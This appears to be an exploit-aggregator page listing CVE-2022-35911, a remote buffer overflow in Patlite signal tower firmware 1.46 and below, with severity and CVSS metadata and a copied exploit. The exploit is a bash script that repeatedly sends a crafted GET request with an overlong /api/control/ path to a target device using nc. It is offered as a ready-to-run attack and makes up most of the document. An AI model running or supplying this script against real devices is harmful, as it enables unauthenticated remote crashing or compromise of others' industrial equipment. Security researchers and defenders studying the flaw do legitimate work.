Patlite 1.46 Buffer Overflow

CVE: CVE-2022-35911
Category: CWE-119
Price: $500
Severity: High
Author: John Doe
Risk: High
Exploitation Type: Remote
Date: 2022-07-25
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070068

Below is a copy:

Patlite 1.46 Buffer Overflow
# Exploit Title: CVE-2022-35911 - Patlite Overflow.
# Date: 2022-07-07
# Exploit Author: Samy Younsi - Necrum Security Labs
# Vendor Homepage: https://www.patlite.co.jp
# Software Link: https://www.patlite.co.jp/product/detail0000021462.html
# Version: Versions 1.46 and below are affected
# Tested on: CentOS & Ubuntu
# CVE : CVE-2022-35911


#!/bin/bash

IP="192.168.1.101"
PORT="80"

for i in {0..1000}; 
do 
  echo "[$i]: "; 
  echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; 
done > /dev/null 2>&1
